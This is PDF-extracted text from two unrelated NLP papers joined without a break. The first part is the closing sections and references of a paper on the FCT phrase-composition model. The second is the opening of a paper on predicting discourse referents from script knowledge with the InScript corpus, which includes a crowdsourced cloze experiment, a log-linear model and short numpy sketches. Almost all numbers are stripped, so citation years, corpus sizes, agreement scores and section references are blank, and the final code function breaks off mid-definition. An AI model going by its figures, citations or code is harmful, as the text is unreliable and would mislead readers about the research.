there are three ways to restore these interac- tions: the first is to use word-specific/tensor trans- formations to force the interactions between com- ponent words in a phrase. in these methods, word- specific transformations, which are usually matri- ces, are learned for a subset of words according to their syntactic properties (e.g. pos tags) (baroni and zamparelli, ; socher et al., ; grefen- stette et al., ; erk, ). composition between a word in this subset and another word becomes the multiplication between the matrix associated with one word and the embedding of the other, produc- ing a new embedding for the phrase. using one tensor (not word-specific) to compose two embed- ding vectors (has not been tested on phrase similar- ity tasks) (bordes et al., ; socher et al., b) is a special case of this approach, where a “word- specific transformation matrix” is derived by multi- plying the tensor and the word embedding. addi- tionally, word-specific matrices can only capture the interaction between a word and one of its context words; others have considered extensions to multi- ple words (grefenstette et al., ; dinu and ba- roni, ). the primary drawback of these ap- proaches is the high computational complexity, lim- iting their usefulness for semantics (section . .) a second approach draws on the concept of con- textualization (erk and padó, ; dinu and lap- ata, ; thater et al., ), which sums embed- dings of multiple words in a linear combination. for example, cheung and penn ( ) apply contextu- alization to word compositions in a generative event extraction model. however, this is an indirect way to capture interactions (the transformations are still unaware of interactions between components), and thus has not been a popular choice for composition. the third approach is to refine word-independent compositional transformations with annotation fea- tures. fct falls under this approach. the primary advantage is that composition can rely on richer lin- guistic features from the context. while the em- beddings of component words still cannot interact, they can interact with other information (i.e. fea- tures) of their context words, and even the global features. recent research has created novel features based on combining word embeddings and contex- tual information (nguyen and grishman, ; roth and woodsend, ; kiros et al., ; yu et al., ; yu et al., ). yu et al. ( ) further pro- posed converting the contextual features into a hid- den layer called feature embeddings, which is sim- ilar to the α matrix in this paper. examples of ap- plications to phrase semantics include socher et al. ( a) and hermann and blunsom ( ), who en- hanced rnns by refining the transformation matri- ces with phrase types and ccg super tags. how- ever, these models are only able to use limited infor- mation (usually one property for each compositional transformation), whereas fct exploits multiple fea- tures. finally, our work is related to recent work on low-rank tensor approximations. when we use the phrase embedding ep in eq. ( ) to predict a label y, the score of y given phrase p will be s(y,p) = uty ep = ∑n i u t y (λi � ewi) in log-linear models, where uy is the parameter vector for y. this is equivalent to using a parameter tensor t to evaluate the score with s′(y,p) = ∑n i t × y× f(wi,p)× ewi , while forcing the tensor to have a low-rank form as t ≈ u⊗α⊗ew. here ×k indicates tensor mul- tiplication of the kth view, and ⊗ indicates matrix outer product (kolda and bader, ). 
from this point of view, our work is closely related to the dis- criminative training methods for low-rank tensors in nlp (cao and khudanpur, ; lei et al., ), while it can handle more complex ngram-to-ngram tasks, where the label y also has its embedding com- posed from basic word embeddings. therefore our model can capture the above work as special cases. moreover, we have a different method of decompos- ing the inputs, which results in views of lexical parts and non-lexical features. as we show in this paper, this input decomposition allows us to benefit from pre-trained word embeddings and feature weights. conclusion we have presented fct, a new composition model for deriving phrase embeddings from word embed- dings. compared to existing phrase composition models, fct is very efficient and can utilize high di- mensional word embeddings, which are crucial for semantic similarity tasks. we have demonstrated how fct can be utilized in a language modeling set- ting, as well as tuned with task-specific data. fine- tuning embeddings on task-specific data can further improve fct, but combining both lm and task- spec objectives yields the best results. we have demonstrated improvements on both language mod- eling and several semantic similarity tasks. our im- plementation and datasets are publicly available. while our results demonstrate improvements for longer phrases, we still only focus on flat phrase structures. in future work we plan to fct with the idea of recursively building representations. this would allow the utilization of hierarchical structure while restricting compositions to a small number of components. acknowledgments we thank matthew r. gormley for his input and anonymous reviewers for their comments. mo yu is supported by the china scholarship council and by nsfc . references marco baroni and roberto zamparelli. . nouns are vectors, adjectives are matrices: representing adjective-noun constructions in semantic space. in empirical methods in natural language processing (emnlp), pages – . yoshua bengio, réjean ducharme, pascal vincent, and christian janvin. . a neural probabilistic lan- guage model. the journal of machine learning re- search (jmlr), : – . antoine bordes, xavier glorot, jason weston, and yoshua bengio. . a semantic matching energy function for learning with multi-relational data. ma- chine learning, ( ): – . yuan cao and sanjeev khudanpur. . online learn- ing in tensor space. in association for computational linguistics (acl), pages – . jackie chi kit cheung and gerald penn. . prob- abilistic domain modelling with contextualized distri- butional semantic vectors. in association for compu- tational linguistics (acl), pages – . https://github.com/gorov/fct_phrasesim_tacl ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neu- ral networks with multitask learning. in international conference on machine learning (icml), pages – . ronan collobert. . deep learning for efficient dis- criminative parsing. in international conference on artificial intelligence and statistics (aistats), pages – . georgiana dinu and marco baroni. . how to make words with vectors: phrase generation in distributional semantics. in association for computational linguis- tics (acl), pages – . georgiana dinu and mirella lapata. . measuring distributional similarity in context. in empirical meth- ods in natural language processing (emnlp), pages – . katrin erk and sebastian padó. . a structured vector space model for word meaning in context. 
in empirical methods in natural language processing (emnlp), pages – . katrin erk. . towards a semantics for distributional representations. in international conference on com- putational semantics (iwcs ), pages – . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in north american chapter of the associ- ation for computational linguistics (naacl), pages – . edward grefenstette, georgiana dinu, yao-zhong zhang, mehrnoosh sadrzadeh, and marco baroni. . multi-step regression learning for composi- tional distributional semantics. arxiv: . . karl moritz hermann and phil blunsom. . the role of syntax in vector space models of compositional se- mantics. in association for computational linguistics (acl), pages – . karl moritz hermann, dipanjan das, jason weston, and kuzman ganchev. . semantic frame identifi- cation with distributed word representations. in as- sociation for computational linguistics (acl), pages – . eric h huang, richard socher, christopher d manning, and andrew y ng. . improving word representa- tions via global context and multiple word prototypes. in association for computational linguistics (acl), pages – . ryan kiros, richard zemel, and ruslan r salakhutdinov. . a multiplicative model for learning distributed text-based attribute representations. in advances in neural information processing systems (nips), pages – . tamara g kolda and brett w bader. . ten- sor decompositions and applications. siam review, ( ): – . ioannis korkontzelos, torsten zesch, fabio massimo zanzotto, and chris biemann. . semeval- task : evaluating phrasal semantics. in joint con- ference on lexical and computational semantics (* sem), pages – . quoc v le and tomas mikolov. . distributed repre- sentations of sentences and documents. arxiv preprint arxiv: . . tao lei, yu xin, yuan zhang, regina barzilay, and tommi jaakkola. . low-rank tensors for scoring dependency structures. in association for computa- tional linguistics (acl), pages – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. arxiv preprint arxiv: . . tomas mikolov, ilya sutskever, kai chen, greg corrado, and jeffrey dean. b. distributed representations of words and phrases and their compositionality. arxiv preprint arxiv: . . jeff mitchell and mirella lapata. . vector-based models of semantic composition. in association for computational linguistics (acl), pages – . jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive science, ( ): – . courtney napoles, matthew gormley, and benjamin van durme. . annotated gigaword. in acl joint workshop on automatic knowledge base construction and web-scale knowledge extraction, pages – . thien huu nguyen and ralph grishman. . employ- ing word representations and regularization for domain adaptation of relation extraction. in association for computational linguistics (acl), pages – . robert parker, david graff, junbo kong, ke chen, and kazuaki maeda. . english gigaword fifth edition, june. linguistic data consortium, ldc t . michael roth and kristian woodsend. . compo- sition of word representations improves semantic role labelling. in empirical methods in natural language processing (emnlp), pages – . richard socher, christopher d manning, and andrew y ng. . learning continuous phrase representa- tions and syntactic parsing with recursive neural net- works. in nips workshop on deep learning and un- supervised feature learning, pages – . 
richard socher, jeffrey pennington, eric h huang, andrew y ng, and christopher d manning. . semi-supervised recursive autoencoders for predicting sentiment distributions. in empirical methods in natural language processing (emnlp), pages – . richard socher, brody huval, christopher d manning, and andrew y ng. . semantic compositionality through recursive matrix-vector spaces. in empirical methods in natural language processing (emnlp), pages – . richard socher, john bauer, christopher d. manning, and andrew y. ng. a. parsing with compositional vector grammars. in association for computational linguistics (acl), pages – . richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew ng, and christopher potts. b. recursive deep models for semantic compositionality over a sentiment treebank. in empirical methods in natural language processing (emnlp), pages – . stefan thater, hagen fürstenau, and manfred pinkal. . word meaning in context: a simple and effective vector model. in international joint conference on natural language processing (ijcnlp), pages – . joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in association for computational linguistics (acl), pages – . peter d turney. . domain and function: a dual-space model of semantic relations and compositions. journal of artificial intelligence research (jair), : – . mo yu and mark dredze. . improving lexical embeddings with semantic knowledge. in association for computational linguistics (acl), pages – . mo yu, matthew gormley, and mark dredze. . factor-based compositional embedding models. in nips workshop on learning semantics. mo yu, matthew r. gormley, and mark dredze. . combining word embeddings and feature embeddings for fine-grained relation extraction. in north american chapter of the association for computational linguistics (naacl). fabio massimo zanzotto, ioannis korkontzelos, francesca fallucchi, and suresh manandhar. . estimating linear models for compositional distributional semantics. in international conference on computational linguistics (coling), pages – .
https://www.transacl.org/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/modeling-semantic-expectation-using-script-knowledge-for-referent-prediction( c a - ee - b -af a- ac aad ).html modeling semantic expectation: using script knowledge for referent prediction ashutosh modi , ivan titov , vera demberg , asad sayeed , manfred pinkal , {ashutosh,vera,asayeed,pinkal}@coli.uni-saarland.de titov@uva.nl universität des saarlandes, germany illc, university of amsterdam, the netherlands abstract recent research in psycholinguistics has pro- vided increasing evidence that humans predict upcoming content. prediction also affects per- ception and might be a key to robustness in human language processing. in this paper, we investigate the factors that affect human prediction by building a computational model that can predict upcoming discourse referents based on linguistic knowledge alone vs. lin- guistic knowledge jointly with common-sense knowledge in the form of scripts. we find that script knowledge significantly improves model estimates of human predictions. in a second study, we test the highly controversial hypothesis that predictability influences refer- ring expression type but do not find evidence for such an effect. introduction being able to anticipate upcoming content is a core property of human language processing (kutas et al., ; kuperberg and jaeger, ) that has re- ceived a lot of attention in the psycholinguistic liter- ature in recent years. expectations about upcoming words help humans comprehend language in noisy settings and deal with ungrammatical input. in this paper, we use a computational model to address the question of how different layers of knowledge (lin- guistic knowledge as well as common-sense knowl- edge) influence human anticipation. here we focus our attention on semantic pre- dictions of discourse referents for upcoming noun phrases. this task is particularly interesting because it allows us to separate the semantic task of antic- ipating an intended referent and the processing of the actual surface form. for example, in the con- text of i ordered a medium sirloin steak with fries. later, the waiter brought . . . , there is a strong ex- pectation of a specific discourse referent, i.e., the referent introduced by the object np of the preced- ing sentence, while the possible referring expression could be either the steak i had ordered, the steak, our food, or it. existing models of human predic- tion are usually formulated using the information- theoretic concept of surprisal. in recent work, how- ever, surprisal is usually not computed for drs, which represent the relevant semantic unit, but for the surface form of the referring expressions, even though there is an increasing amount of literature suggesting that human expectations at different lev- els of representation have separable effects on pre- diction and, as a consequence, that the modelling of only one level (the linguistic surface form) is in- sufficient (kuperberg and jaeger, ; kuperberg, ; zarcone et al., ). the present model ad- dresses this shortcoming by explicitly modelling and representing common-sense knowledge and concep- tually separating the semantic (discourse referent) and the surface level (referring expression) expec- tations. 
our discourse referent prediction task is related to the nlp task of coreference resolution, but it substantially differs from that task in the following ways: ) we use only the incrementally available left context, while coreference resolution uses the full text; ) coreference resolution tries to identify the dr for a given target np in context, while we look at the expectations of drs based only on the context transactions of the association for computational linguistics, vol. , pp. – , . action editor: hwee tou ng. submission batch: / revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. before the target np is seen. the distinction between referent prediction and prediction of referring expressions also allows us to study a closely related question in natural language generation: the choice of a type of referring expres- sion based on the predictability of the dr that is intended by the speaker. this part of our work is inspired by a referent guessing experiment by tily and piantadosi ( ), who showed that highly pre- dictable referents were more likely to be realized with a pronoun than unpredictable referents, which were more likely to be realized using a full np. the effect they observe is consistent with a gricean point of view, or the principle of uniform information den- sity (see section . ). however, tily and piantadosi do not provide a computational model for estimat- ing referent predictability. also, they do not include selectional preference or common-sense knowledge effects in their analysis. we believe that script knowledge, i.e., common- sense knowledge about everyday event sequences, represents a good starting point for modelling con- versational anticipation. this type of common-sense knowledge includes temporal structure which is par- ticularly relevant for anticipation in continuous lan- guage processing. furthermore, our approach can build on progress that has been made in recent years in methods for acquiring large-scale script knowl- edge; see section . . our hypothesis is that script knowledge may be a significant factor in human an- ticipation of discourse referents. explicitly mod- elling this knowledge will thus allow us to produce more human-like predictions. script knowledge enables our model to generate anticipations about discourse referents that have al- ready been mentioned in the text, as well as anticipa- tions about textually new discourse referents which have been activated due to script knowledge. by modelling event sequences and event participants, our model captures many more long-range depen- dencies than normal language models are able to. as an example, consider the following two alternative text passages: we got seated, and had to wait for minutes. then, the waiter brought the ... we ordered, and had to wait for minutes. then, the waiter brought the ... preferred candidate referents for the object posi- tion of the waiter brought the ... are instances of the food, menu, or bill participant types. in the con- text of the alternative preceding sentences, there is a strong expectation of instances of a menu and a food participant, respectively. this paper represents foundational research in- vestigating human language processing. however, it also has the potential for application in assistant technology and embodied agents. the goal is to achieve human-level language comprehension in re- alistic settings, and in particular to achieve robust- ness in the face of errors or noise. 
explicitly mod- elling expectations that are driven by common-sense knowledge is an important step in this direction. in order to be able to investigate the influence of script knowledge on discourse referent expecta- tions, we use a corpus that contains frequent refer- ence to script knowledge, and provides annotations for coreference information, script events and par- ticipants (section ). in section , we present a large-scale experiment for empirically assessing hu- man expectations on upcoming referents, which al- lows us to quantify at what points in a text humans have very clear anticipations vs. when they do not. our goal is to model human expectations, even if they turn out to be incorrect in a specific instance. the experiment was conducted via mechanical turk and follows the methodology of tily and pianta- dosi ( ). in section , we describe our computa- tional model that represents script knowledge. the model is trained on the gold standard annotations of the corpus, because we assume that human compre- henders usually will have an analysis of the preced- ing discourse which closely corresponds to the gold standard. we compare the prediction accuracy of this model to human predictions, as well as to two baseline models in section . . one of them uses only structural linguistic features for predicting ref- erents; the other uses general script-independent se- lectional preference features. in section , we test whether surprisal (as estimated from human guesses vs. computational models) can predict the type of referring expression used in the original texts in the corpus (pronoun vs. full referring expression). this experiment also has wider implications with respect to the on-going discussion of whether the referring expression choice is dependent on predictability, as predicted by the uniform information density hy- (i)( )p bather [decided]e wash to take a (bath)( )p bath yesterday afternoon after working out . once (i)( )p bather got back home , (i)( )p bather [walked]e enter bathroom to (my)( )p bather (bathroom)( )p bathroom and first quickly scrubbed the (bathroom tub)( )p bathtub by [turning on]e turn water on the (water)( )p water and rinsing (it)( )p bathtub clean with a rag . after (i)( )p bather finished , (i)( )p bather [plugged]e close drain the (tub)( )p bathtub and began [filling]e fill water (it)( )p bathtub with warm (water)( )p water set at about (degrees)( )p temperature . figure : an excerpt from a story in the inscript corpus. the referring expressions are in parentheses, and the corresponding discourse referent label is given by the superscript. referring expressions of the same discourse referent have the same color and superscript number. script-relevant events are in square brackets and colored in orange. event type is indicated by the corresponding subscript. pothesis. the contributions of this paper consist of: • a large dataset of human expectations, in a va- riety of texts related to every-day activities. • an implementation of the conceptual distinction between the semantic level of referent predic- tion and the type of a referring expression. • a computational model which significantly im- proves modelling of human anticipations. • showing that script knowledge is a significant factor in human expectations. • testing the hypothesis of tily and piantadosi that the choice of the type of referring expres- sion (pronoun or full np) depends on the pre- dictability of the referent. . 
scripts scripts represent knowledge about typical event sequences (schank and abelson, ), for exam- ple the sequence of events happening when eating at a restaurant. script knowledge thereby includes events like order, bring and eat as well as partici- pants of those events, e.g., menu, waiter, food, guest. existing methods for acquiring script knowledge are based on extracting narrative chains from text (chambers and jurafsky, ; chambers and juraf- sky, ; jans et al., ; pichotta and mooney, ; rudinger et al., ; modi, ; ahrendt and demberg, ) or by eliciting script knowledge via crowdsourcing on mechanical turk (regneri et al., ; frermann et al., ; modi and titov, ). modelling anticipated events and participants is motivated by evidence showing that event repre- sentations in humans contain information not only about the current event, but also about previous and future states, that is, humans generate anticipa- tions about event sequences during normal language comprehension (schütz-bosbach and prinz, ). script knowledge representations have been shown to be useful in nlp applications for ambiguity reso- lution during reference resolution (rahman and ng, ). data: the inscript corpus ordinary texts, including narratives, encode script structure in a way that is too complex and too im- plicit at the same time to enable a systematic study of script-based expectation. they contain interleaved references to many different scripts, and they usually refer to single scripts in a point-wise fashion only, relying on the ability of the reader to infer the full event chain using their background knowledge. we use the inscript corpus (modi et al., ) to study the predictive effect of script knowledge. in- script is a crowdsourced corpus of simple narrative texts. participants were asked to write about a spe- cific activity (e.g., a restaurant visit, a bus ride, or a grocery shopping event) which they personally ex- perienced, and they were instructed to tell the story as if explaining the activity to a child. this resulted in stories that are centered around a specific scenario and that explicitly mention mundane details. thus, they generally realize longer event chains associated with a single script, which makes them particularly appropriate to our purpose. the inscript corpus is labelled with event-type, participant-type, and coreference information. full verbs are labeled with event type information, heads of all noun phrases with participant types, using scenario-specific lists of event types (such as enter bathroom, close drain and fill water for the “taking a bath” scenario) and participant types (such as bather, water and bathtub). on average, each template of- fers a choice of event types and participant (i)( ) decided to take a (bath)( ) yesterday afternoon after working out . once (i)( ) got back home , (i)( ) walked to (my)( ) (bathroom)( ) and first quickly scrubbed the (bathroom tub)( ) by turning on the (water)( ) and rinsing (it)( ) clean with a rag . af- ter (i)( ) finished , (i)( ) plugged xxxxxx figure : an illustration of the mechanical turk exper- iment for the referent cloze task. workers are supposed to guess the upcoming referent (indicated by xxxxxx above). they can either choose from the previously acti- vated referents, or they can write something new. dr_ (p_bathtub) the drain (new dr) dr_ (p_bather) n u m b e r o f w o rk e rs figure : response of workers corresponding to the story in fig. . workers guessed two already activated dis- course referents (dr) dr and dr . 
some of the workers also chose the “new” option and wrote different lexical variants of “bathtub drain”, a new dr correspond- ing to the participant type “the drain”. types. the inscript corpus consists of stories ad- dressing scenarios (about stories per scenario). the corpus has , words, , verb in- stances with event labels, and , head nouns with participant instances. modi et al. ( ) report an inter-annotator agreement of . for event types and . for participant types (fleiss’ kappa). we use gold-standard event- and participant-type annotation to study the influence of script knowl- edge on the expectation of discourse referents. in addition, inscript provides coreference annotation, which makes it possible to keep track of the men- tioned discourse referents at each point in the story. we use this information in the computational model of dr prediction and in the dr guessing experiment described in the next section. an example of an an- notated inscript story is shown in figure . referent cloze task we use the inscript corpus to develop computa- tional models for the prediction of discourse refer- ents (drs) and to evaluate their prediction accuracy. this can be done by testing how often our models manage to reproduce the original discourse referent (cf. also the “narrative cloze” task by (chambers and jurafsky, ) which tests whether a verb together with a role can be correctly guessed by a model). however, we do not only want to predict the “cor- rect” drs in a text but also to model human expec- tation of drs in context. to empirically assess hu- man expectation, we created an additional database of crowdsourced human predictions of discourse ref- erents in context using amazon mechanical turk. the design of our experiment closely resembles the guessing game of (tily and piantadosi, ) but ex- tends it in a substantial way. workers had to read stories of the inscript corpus and guess upcoming participants: for each target np, workers were shown the story up to this np ex- cluding the np itself, and they were asked to guess the next person or object most likely to be referred to. in case they decided in favour of a discourse ref- erent already mentioned, they had to choose among the available discourse referents by clicking an np in the preceding text, i.e., some noun with a specific, coreference-indicating color; see figure . other- wise, they would click the “new” button, and would in turn be asked to give a short description of the new person or object they expected to be mentioned. the percentage of guesses that agree with the actually re- ferred entity was taken as a basis for estimating the surprisal. the experiment was done for all stories of the test set: stories ( %) of the inscript corpus, evenly taken from all scenarios. since our focus is on the effect of script knowledge, we only consid- ered those nps as targets that are direct dependents of script-related events. guessing started from the third sentence only in order to ensure that a mini- mum of context information was available. to keep the complexity of the context manageable, we re- stricted guessing to a maximum of targets and skipped the rest of the story (this applied to % of the stories). we collected guesses per np for noun phrase instances, which amounts to a to- tal of around k guesses. workers selected a con- the corpus is available at : http://www.sfb . uni-saarland.de/?page_id= http://www.sfb .uni-saarland.de/?page_id= http://www.sfb .uni-saarland.de/?page_id= text np in % of cases and “new” in % of cases. 
our leading hypothesis is that script knowledge substantially influences human expectation of dis- course referents. the guessing experiment provides a basis to estimate human expectation of already mentioned drs (the number of clicks on the respec- tive nps in text). however, we expect that script knowledge has a particularly strong influence in the case of first mentions. once a script is evoked in a text, we assume that the full script structure, includ- ing all participants, is activated and available to the reader. tily and piantadosi ( ) are interested in sec- ond mentions only and therefore do not make use of the worker-generated noun phrases classified as “new”. to study the effect of activated but not explicitly mentioned participants, we carried out a subsequent annotation step on the worker-generated noun phrases classified as “new”. we presented an- notators with these noun phrases in their contexts (with co-referring nps marked by color, as in the m- turk experiment) and, in addition, displayed all par- ticipant types of the relevant script (i.e., the script as- sociated with the text in the inscript corpus). anno- tators did not see the “correct” target np. we asked annotators to either ( ) select the participant type in- stantiated by the np (if any), ( ) label the np as un- related to the script, or ( ), link the np to an overt antecedent in the text, in the case that the np is ac- tually a second mention that had been erroneously labeled as new by the worker. option ( ) provides a basis for a fine-grained estimation of first-mention drs. option ( ), which we added when we noticed the considerable number of overlooked antecedents, serves as correction of the results of the m-turk ex- periment. out of the k annotated “new” cases, % were identified as second mentions, % were linked to a participant type, and % were classified as really novel. referent prediction model in this section, we describe the model we use to predict upcoming discourse referents (drs). . model our model should not only assign probabilities to drs already explicitly introduced in the preced- ing text fragment (e.g., “bath” or “bathroom” for the cloze task in figure ) but also reserve some prob- ability mass for ‘new’ drs, i.e., drs activated via the script context or completely novel ones not be- longing to the script. in principle, different variants of the activation mechanism must be distinguished. for many participant types, a single participant be- longing to a specific semantic class is expected (re- ferred to with the bathtub or the soap). in contrast, the “towel’ participant type may activate a set of ob- jects, elements of which then can be referred to with a towel or another towel. the “bath means” partici- pant type may even activate a group of drs belong- ing to different semantic classes (e.g., bubble bath and salts). since it is not feasible to enumerate all potential participants, for ‘new’ drs we only pre- dict their participant type (“bath means” in our ex- ample). in other words, the number of categories in our model is equal to the number of previously introduced drs plus the number of participant types of the script plus , reserved for a new dr not corre- sponding to any script participant (e.g., cellphone). in what follows, we slightly abuse the terminology and refer to all these categories as discourse refer- ents. 
unlike standard co-reference models, which predict co-reference chains relying on the entire document, our model is incremental, that is, when predicting a discourse referent d(t) at a given position t, it can look only in the history h(t) (i.e., the preceding part of the document), excluding the referring expression (re) for the predicted dr. we also assume that past res are correctly resolved and assigned to correct participant types (pts). typical nlp applications use automatic coreference resolution systems, but since we want to model human behavior, this might be inappropriate, since an automated system would underestimate human performance. this may be a strong assumption, but for reasons explained above, we use gold standard past res. we use the following log-linear model ("softmax regression"):

$$p(d^{(t)} = d \mid h^{(t)}) = \frac{\exp\big(w^{\top} f(d, h^{(t)})\big)}{\sum_{d'} \exp\big(w^{\top} f(d', h^{(t)})\big)},$$

where f is the feature function we will discuss in the following subsection, w are model parameters, and the summation in the denominator is over the set of categories described above.

some of the features included in f are a function of the predicate syntactically governing the unobservable target re (corresponding to the dr being predicted). however, in our incremental setting, the predicate is not available in the history h(t) for subject nps. in this case, we use an additional probabilistic model, which estimates the probability of the predicate v given the context h(t), and marginalize out its predictions:

$$p(d^{(t)} = d \mid h^{(t)}) = \sum_{v} p(v \mid h^{(t)}) \, \frac{\exp\big(w^{\top} f(d, h^{(t)}, v)\big)}{\sum_{d'} \exp\big(w^{\top} f(d', h^{(t)}, v)\big)}.$$

the predicate probabilities p(v|h(t)) are computed based on the sequence of preceding predicates (i.e., ignoring any other words) using the recurrent neural network language model estimated on our training set (we used the rnnlm toolkit (mikolov et al., ; mikolov et al., ) with default settings). the expression f(d,h(t),v) denotes the feature function computed for the referent d, given the history composed of h(t) and the predicate v.

. features

our features encode properties of a dr as well as characterize its compatibility with the context. we face two challenges when designing our features. first, although the sizes of our datasets are respectable from the script annotation perspective, they are too small to learn a richly parameterized model. for many of our features, we address this challenge by using external word embeddings (we use -dimensional word embeddings estimated on wikipedia with the skip-gram model of mikolov et al. ( ): https://code.google.com/p/word vec/) and associate parameters with some simple similarity measures computed using these embeddings. consequently, there are only a few dozen parameters which need to be estimated from scenario-specific data. second, in order to test our hypothesis that script information is beneficial for the dr prediction task, we need to disentangle the influence of script information from general linguistic knowledge. we address this by carefully splitting the features apart, even if it prevents us from modeling some interplay between the sources of information. we will describe both classes of features below; also see a summary in table :

table : summary of feature types
  feature                   type
  recency                   shallow linguistic
  frequency                 shallow linguistic
  grammatical function      shallow linguistic
  previous subject          shallow linguistic
  previous object           shallow linguistic
  previous re type          shallow linguistic
  selectional preferences   linguistic
  participant type fit      script
  predicate schemas         script
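as a concrete illustration of the two scoring equations above, here is a small numpy sketch (hypothetical; the feature matrices are stand-ins for the features described in the following subsections). the first function is the plain softmax over candidate categories; the second marginalizes over possible governing predicates when the predicate has not been observed yet:

```python
import numpy as np

def softmax_probs(w, feats):
    """p(d | h) for every candidate d.
    w     : (k,) weight vector
    feats : (n_candidates, k) matrix whose i-th row is f(d_i, h)
    """
    scores = feats @ w
    scores -= scores.max()          # numerical stability
    exps = np.exp(scores)
    return exps / exps.sum()

def marginalized_probs(w, feats_per_verb, verb_probs):
    """p(d | h) = sum_v p(v | h) * softmax_d( w . f(d, h, v) ).
    feats_per_verb : list of (n_candidates, k) matrices, one per candidate verb v
    verb_probs     : (n_verbs,) probabilities p(v | h), e.g. from a language model
    """
    probs = np.zeros(feats_per_verb[0].shape[0])
    for p_v, feats in zip(verb_probs, feats_per_verb):
        probs += p_v * softmax_probs(w, feats)
    return probs
```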
. . shallow linguistic features these features are based on tily and pianta- dosi ( ). in addition, we consider a selectional preference feature. recency feature. this feature captures the distance lt(d) between the position t and the last occurrence of the candidate dr d. as a distance measure, we use the number of sentences from the last mention and exponentiate this number to make the depen- dence more extreme; only very recent drs will re- ceive a noticeable weight: exp(−lt(d)). this feature is set to for new drs. frequency. the frequency feature indicates the number of times the candidate discourse referent d has been mentioned so far. we do not perform any bucketing. grammatical function. this feature encodes the dependency relation assigned to the head word of the last mention of the dr or a special none label if the dr is new. previous subject indicator. this binary feature in- dicates whether the candidate dr d is coreferential with the subject of the previous verbal predicate. previous object indicator. the same but for the ob- ject position. previous re type. this three-valued feature indi- cates whether the previous mention of the candidate dr d is a pronoun, a non-pronominal noun phrase, or has never been observed before. . . selectional preferences feature the selectional preference feature captures how well the candidate dr d fits a given syntactic po- sition r of a given verbal predicate v. it is com- puted as the cosine similarity simcos(xtd ,xv,r) of a vector-space representation of the dr xd and a structured vector-space representation of the pred- https://code.google.com/p/word vec/ icate xv,r. the similarities are calculated using a distributional memory approach similar to that of baroni and lenci ( ). their structured vector space representation has been shown to work well on tasks that evaluate correlation with human the- matic fit estimates (baroni and lenci, ; baroni et al., ; sayeed et al., ) and is thus suited to our task. the representation xd is computed as an aver- age of head word representations of all the previ- ous mentions of dr d, where the word vectors are obtained from the typedm model of baroni and lenci ( ). this is a count-based, third-order co- occurrence tensor whose indices are a word w , a second word w , and a complex syntactic relation r, which is used as a stand-in for a semantic link. the values for each (w ,r,w ) cell of the tensor are the local mutual information (lmi) estimates obtained from a dependency-parsed combination of large cor- pora (ukwac, bnc, and wikipedia). our procedure has some differences with that of baroni and lenci. for example, for estimating the fit of an alternative new dr (in other words, xd based on no previous mentions), we use an aver- age over head words of all res in the training set, a “null referent.” xv,r is calculated as the average of the top (by lmi) r-fillers for v in typedm; in other words, the prototypical instrument of rub may be represented by summing vectors like towel, soap, eraser, coin. . . if the predicate has not yet been en- countered (as for subject positions), scores for all scenario-relevant verbs are emitted for marginaliza- tion. . . script features in this section, we describe features which rely on script information. our goal will be to show that such common-sense information is beneficial in per- forming dr prediction. we consider only two script features. 
participant type fit

this feature characterizes how well the participant type (pt) of the candidate dr d fits a specific syntactic role r of the governing predicate v; it can be regarded as a generalization of the selectional preference feature to participant types and also its specialisation to the considered scenario. given the candidate dr d, its participant type p, and the syntactic relation r, we collect all the predicates in the training set which have the participant type p in the position r. the embedding of the dr xp,r is given by the average embedding of these predicates. the feature is computed as the dot product of xp,r and the word embedding of the predicate v.

figure : an example of the referent cloze task. similar to the mechanical turk experiment (figure ), our referent prediction model is asked to guess the upcoming dr:
  (i)( ) decided to take a (bath)( ) yesterday afternoon after working out . (i)( ) was getting ready to go out and needed to get cleaned before (i)( ) went so (i)( ) decided to take a (bath)( ). (i)( ) filled the (bathtub)( ) with warm (water)( ) and added some (bubble bath)( ). (i)( ) got undressed and stepped into the (water)( ). (i)( ) grabbed the (soap)( ) and rubbed it on (my)( ) (body)( ) and rinsed xxxxxx

predicate schemas

the following feature captures a specific aspect of knowledge about prototypical sequences of events. this knowledge is called predicate schemas in the recent co-reference modeling work of peng et al. ( ). in predicate schemas, the goal is to model pairs of events such that if a dr d participated in the first event (in a specific role), it is likely to participate in the second event (again, in a specific role). for example, in the restaurant scenario, if one observes a phrase john ordered, one is likely to see john waited somewhere later in the document. specific arguments are not that important (whether it is john or some other dr); what is important is that the argument is reused across the predicates. this would correspond to the rule x-subject-of-order → x-subject-of-eat. unlike the previous work, our dataset is small, so we cannot induce these rules directly as there will be very few rules, and the model would not generalize to new data well enough. instead, we again encode this intuition using similarities in the real-valued embedding space. (in this work, we limit ourselves to rules where the syntactic function is the same on both sides of the rule. in other words, we can, in principle, encode the pattern x pushed y → x apologized but not the pattern x pushed y → y cried.)

recall that our goal is to compute a feature ϕ(d,h(t)) indicating how likely a potential dr d is to follow, given the history h(t). for example, imagine that the model is asked to predict the dr marked by xxxxxx in figure . predicate-schema rules can only yield previously introduced drs, so the score ϕ(d,h(t)) = 0 for any new dr d.

table : summary of model features
  base (shallow linguistic features): recency, frequency, grammatical function, previous subject, previous object
  linguistic (shallow linguistic features + linguistic feature): recency, frequency, grammatical function, previous subject, previous object + selectional preferences
  script (shallow linguistic features + linguistic feature + script features): recency, frequency, grammatical function, previous subject, previous object + selectional preferences + participant type fit, predicate schemas
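the two embedding-based compatibility features used so far (the selectional preference feature and the participant type fit above) reduce to a cosine and a dot product between averaged word vectors. the sketch below is illustrative only: it assumes word vectors pre-loaded into a dict and stands in for the typedm-based representations used in the paper; the predicate-schema score itself is sketched after the experimental setup below.

```python
import numpy as np

def avg_vec(words, emb):
    """Average embedding of a list of head words (e.g. previous mentions of a DR)."""
    vecs = [emb[w] for w in words if w in emb]
    dim = len(next(iter(emb.values())))
    return np.mean(vecs, axis=0) if vecs else np.zeros(dim)

def selectional_preference(dr_mentions, slot_fillers, emb):
    """Cosine between the DR representation (average over its mentions) and the
    predicate-slot representation (average over typical fillers of verb v in role r)."""
    x_d, x_vr = avg_vec(dr_mentions, emb), avg_vec(slot_fillers, emb)
    denom = np.linalg.norm(x_d) * np.linalg.norm(x_vr)
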